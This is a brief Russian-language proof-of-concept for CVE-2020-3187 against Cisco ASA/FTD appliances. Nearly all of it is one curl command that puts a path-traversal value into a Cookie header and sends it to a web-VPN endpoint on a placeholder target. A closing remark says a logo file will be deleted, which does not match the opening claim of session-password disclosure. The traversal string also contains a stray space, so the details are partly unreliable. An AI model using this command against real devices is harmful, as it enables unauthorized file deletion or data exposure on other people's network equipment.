
Эксплойт для доказательства концепции для CVE-2020-3187, нацеленный на раскрытие пароля сессии Cisco ASA/FTD через специально сформированный заголовок HTTP cookie.
curl -H "Cookie: token=. ./+CSOU+/csco_logo.gif" https://target.com/+CSCOE+/session_password.html
(logo.gif будет удалён)